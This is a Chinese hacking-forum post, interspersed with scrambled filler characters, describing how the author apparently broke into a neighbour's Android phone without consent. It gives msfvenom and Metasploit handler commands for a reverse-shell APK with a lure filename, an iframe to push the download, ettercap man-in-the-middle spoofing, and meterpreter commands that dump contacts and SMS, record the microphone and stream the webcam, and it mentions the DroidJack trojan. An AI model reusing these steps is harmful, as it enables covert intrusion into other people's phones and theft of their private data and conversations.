找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1393|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

7 A& Y K% r6 ~, o) q7 V" Q 五、msf+ettercap入侵邻居安卓手机 ' G! v4 U) Z |/ |* u

7 I( i+ E! }% ^7 ]+ a, ^0 l; H

5 M3 a9 M, d4 @ 首先启动msf / @7 I Z3 M, S2 H% I) s

- ]4 x; n+ U8 v3 N# p; A

( G' ~# u( O! P5 g 先用kali生成一个安卓木马,如下命令: * m- W: w; I7 U- H

! F; L: Q0 \$ G' i1 r# X

1 Z! }" m* P* `5 s3 G7 I. [5 b Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk & f0 i7 \3 T: l) M

- A* j4 L; s& M* l

, v3 p+ l- Q) ~7 J 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ' g5 Y, o5 u4 t* N% x7 D

1 O9 Z/ f- a& v

+ ~1 P4 W P6 I# ]; g+ o& C. P6 v 然后进入msf ! d/ u+ Q& ]9 O3 N# G4 {8 N+ y

% f8 _$ o# G- H% c: Y0 z4 p

2 E8 }. S% o/ q& R& K) t) ^5 @ use exploit/multi/handler @4 p; y8 c9 ^

" _% @- B4 D9 r

3 u" a1 J I- y$ ?4 i set payload android/meterpreter/reverse_tcp 8 L2 N. {1 I+ V" ]; D% B, |" s' Z

! @1 F3 v) f4 o% M9 o

, ]; C( C _- P9 k set LHOST 192.168.0.109 //ipkailiip : \9 D) x4 O5 u2 ]4 M" U' w

8 D% D. \7 a: k. w6 N9 d

) D8 M$ O3 h$ e set LPORT 44444 //端口一定要与前面生成的木马的端口一致 % b- f6 A' f6 z, n; g) y. P( U* w

" j8 a' g8 ?( S5 Z! V+ S

U2 Q8 X) s c/ O) t5 f2 p2 m Exploit * n3 o% ~0 h* a

! }/ R+ v1 g9 m4 `7 R: Z8 D& `

' g4 i. E/ Q7 m: o; a6 O   ; K( Z9 Z" l8 _

* w# V1 d/ Q! B. @3 T* z

2 c4 J. G, q# ^0 J6 X. `# P- x 下面我们开启ettercap -G 1 U' m" u9 W! \ Y% x$ p! x; O

/ @9 P2 w( E* Z' m5 X9 Q8 M. h

& L8 v$ d+ `, F* ?2 E- g# M 我物理IP , a! m' [8 q3 j$ |( P+ r# p* p

$ k1 {4 f0 {7 X# ^. V' h1 _, b

! r5 {( }0 p1 U3 n+ V   + ~1 f& K1 r& O2 e Q3 ~

! c: W7 h% @+ c R* l6 J# e

+ a/ y" n: K8 ?+ V% f 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) p& L; Z5 y9 u: ]/ Z

0 ]- u# d+ J* |0 h

% x" ~4 R/ V) `- m 下面我们来设置一下 . R( i8 m8 W( L6 U& r/ U; v; b

9 I, O) g; H% _# {' ]" p

: W5 ~5 B0 }4 O) R   ; a4 l- L0 U0 c5 P

3 y) O7 I. S) _9 v0 ]$ n. [

" h2 F$ Z$ F3 Z4 a* y' e 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ! ]# T% s6 w! C- \9 ~

" {" b6 s( q2 A; E* j* f

; V; v S C) [$ a( G* J   ( ^) ?6 C8 k0 V& M! h3 p

$ h1 F1 ^( L# T

4 ]2 J+ J4 w: `! H% t   0 x: i+ n* E7 ]

9 U& t: E/ ]5 ]: _2 ?( q* S

* F) F/ I" x7 B7 X5 R0 Q' n   2 @+ |$ A8 n2 q2 r4 [, q1 }# n

* a; ]" f) C1 u/ [

4 G y, C* b& C' N+ Q8 \   # e# l+ c% G2 E4 |

* F% N+ x1 _+ Z2 W! R

- ?7 ]" k4 U e, E. i# H% `   ' B2 d; p% |2 X$ D

% v& w; R& M% H" I: F

( d" Y4 u G. ]" |; O% v   7 H5 L, V7 `. c

$ e, K5 r B# q8 M5 Z/ h ~

4 c2 @! P; o% j7 P8 E4 u   8 { F S% ^8 u' d

2 \- a. a* A2 U

, t. s: w4 c$ w, D% d( x3 w2 `/ L   ' p; J8 J& X1 W# y

7 E0 ]. g* ~) ]$ Z. W

! M9 h, b5 U) J5 s' K- \   " V4 P" |8 l3 w1 U# r% U" e

\$ A# @: o( f5 L0 H

' p' @0 ~1 U1 F$ D   7 ~: i, p6 S+ U2 v- \0 x: F- w

( V; X' d- |& Y1 M1 _% a

; Z% }! ~* v8 ~) N# O* ~' T   9 p% K @; ~$ P; W% e

" Z& e) d6 _8 W, ?" u

# r1 r& ?9 v4 C% U6 {, h- U   # J2 @+ f7 @. f9 F: Q

8 Z$ l$ d1 E- g) D ]

$ v3 b1 b ?2 Q. b- G1 S. f   Z3 F# j% i: k% F8 Q

6 I& ^+ W; [1 |# W) f- l

. v+ P* w, j# ?3 X I: U/ D 下面我们开始攻击 & L0 |- W% U2 ?: {5 u, w. w- R+ l- n

3 O4 k# m7 a. o" Q' ]7 h$ U

' l4 F9 e( y& j$ @7 L   3 U: J8 ?7 [+ v6 v

' d$ Q: M# r: c7 O. m9 E& c3 q9 o

: V: P5 w6 z$ h. W2 u8 T   - w; w- t7 L6 t6 C' ^1 K

& a7 X1 ]+ J% G, {2 `

8 h7 ^1 C* O- C" Z8 n' t5 D! b r   9 u; S$ E! ~5 G% T: H

! w; G `. F& ?! K* G3 R% F, O

! F6 v4 L4 K% T4 Z, D   ( _# |8 m% a( d. u: |

1 `/ R) H1 o7 g' f# i8 C: c

' j* K/ I7 X+ l$ T1 K( a   + z2 H7 g# `( V ^& B0 A

. w% y# d( C* d% v8 T% Y; l; y; s0 c

. X, ?0 O3 D& {; m& C" o5 i* k Q7 b 大概过了5分钟多,发现反弹成功了 $ J8 e$ K2 U& n1 \7 O( K$ M

2 c( l. c8 @4 N2 v" Y5 a9 ~7 D1 O

- V0 d# h: ~' J3 G2 S- C   6 z6 `5 J4 K; A7 I$ X1 N

* e; p; `/ A4 [" f: O8 i/ P3 J/ P' F

0 }, V) j6 L5 G3 S: w5 T   ! A5 d) a5 y% S) J: }: ^

; d* m4 m2 ^3 s3 g8 ]

: @: v! D% a1 t* P1 Y# b; a   2 m e/ Z, l( u7 g

8 u9 p9 \+ C. p9 F$ ^

2 G# E: R, _* P6 x   9 F0 e2 u7 Z, t: |. f. T: h

J; e, h, U' ]: }- K7 y2 \) }

2 p' E) h+ N& a" L$ p4 g: Y   ; L4 @% ?& K* C* h0 ]5 V

/ K7 [! V+ ]: B/ ?$ F

' W( `2 N7 @ \) C8 j, m* X" ^   / U" T( [( r& d# {

8 J& @+ ^! e7 K

. ^5 S; Y5 d1 Y4 A   4 h9 K- D/ p1 T0 K* l) m

* ]1 y2 S' k2 o+ c

* Q4 v' w: O, S 执行命令 7 B# U3 L8 ?; S, j" t

5 M. s, f( ?' w* T* `* P% q! s$ r

e6 x4 S) S8 M+ n- @   # ?, m+ E+ N0 u3 Y

7 z5 S% u8 z2 Z5 W

/ f9 i! s9 o% k3 I: y9 M( |! Q dump_contacts    --》这个是导出电话 2 A2 s3 a0 ~2 k% @; ?. w& F

8 |$ d5 x2 T# S" \5 g# P# |, [

8 T! W5 q7 Q" w9 B8 M; j5 x- x4 N) ` dump_sms --》这个是导出信息 % ]/ g; l/ b4 O9 o

" O& y' ~( W9 ]4 W

. E8 h* t1 f R& G, w: V' u2 H record_mic     Record audio from the default microphone for X seconds , U! \1 _. l/ S

, `, Z& m2 |# y3 N# y. D8 v

3 G& F' z7 S5 i. F2 S0 ^     webcam_chat    Start a video chat # G% ^) t0 H, B: K

* U/ d* }" I9 O# T

, @5 P& ?/ p, q( `     webcam_list    List webcams / M& v' c: P" {3 `% J

8 C5 d6 V6 z1 `& D4 V" S

: P6 d: k2 `2 k7 e- S% R     webcam_snap    Take a snapshot from the specified webcam * D! J/ m9 K4 V2 C' J

R* @+ M( l' B+ f; D2 `$ Y5 j

3 q7 c( J2 U- J+ P8 X8 Q webcam_stream  lay a video stream from the specified webcam , {1 z' R3 C9 L8 T6 F# n

) {3 Q( Q% I; Z! F: g) a! @* R

1 ~" M3 e9 N, q- M# \   6 I% a! Q# a+ f+ ]

5 w- p* ~' }9 l ^6 C' _

6 ]6 Z/ n; ?2 I' p5 U   3 P5 Z1 _. j6 [

3 |; k. ?" V% k

( X" z ?; {4 x" z9 X N% H 我们打开看一下电话薄, 3 P. B! V. y( h% N4 l4 o

5 x" R/ N& w' m$ j8 ^: ~. S8 s

7 _# {9 ]% L' ~% z' v   % K$ t |! m5 V9 n# O

a+ o6 J: |5 K9 _, O; w

. r8 @$ D6 s" a, M( y4 z   5 g. N- j# s' @ @

' u; i3 R: J2 T, J

* U+ W R l' K# L   6 q7 B; R- ]3 D) A$ {5 h) @/ e6 B

T4 i8 Z: X5 @( N

+ }* N" M1 f9 b   ~- ~1 h. [8 F$ `

- a4 G- E4 {& b: y

. D+ d: W8 `3 C v2 t7 P/ [# c! ` X4 {   4 W; e1 \5 M& ?5 T" T

$ l8 ~6 c7 G0 M s9 R

: r$ ^( F2 T5 R: t   ) v6 i9 M8 Z" ]8 E' Y# ?- i! H1 L

Y1 w& a* E' w9 J

6 J* U* `, A; f" S: `6 }8 _' T 我们同时欺骗成DroidJack木马,使用方法如图: 9 C% e! i! e! k5 S

: L# Y) E; v- U+ c% {+ O2 ?

# g6 i- o6 P$ V8 K& H   , A" _; k' q/ L$ K/ p

9 ]6 ^6 K% w/ m$ p# N

o7 Y. C# q$ J( G" _- [   8 E* q% ]: D: l8 B6 H) m6 E* z

& S. [" Z. `+ q# b' q; l7 S

3 a+ z9 o$ K) X2 h% M7 u T   : R( ~* T( w; U" }+ j4 n

7 s: v0 F9 s' p+ N1 I# i. l

9 T. F) i7 ?3 U9 U 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 & L/ ]# o, [% i, w8 [

. B& z; b m0 Y8 p

: p: o1 a" l+ f! C4 b   + \& m- v% e& a# k. A. |

" ]8 m. a6 b+ O' m: G. |% a

: ]4 N. {1 K& @! D3 M+ h   ! \2 }4 b+ N3 Q- f

$ I: L& \9 X. r7 A+ x

( c9 V' G" Y5 M, g   ! [' Q7 O8 z$ Z* c; t/ ~9 L

0 f; E, I# W O d

. k" S' s+ o4 @) B8 H/ t $ l% t% k/ A' L! U- d6 ]9 j: b

1 R4 H+ G( r! W, q' g; V' n% @

; H* O: s+ u8 Y2 }
& ?* K9 Y; N( T4 N

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表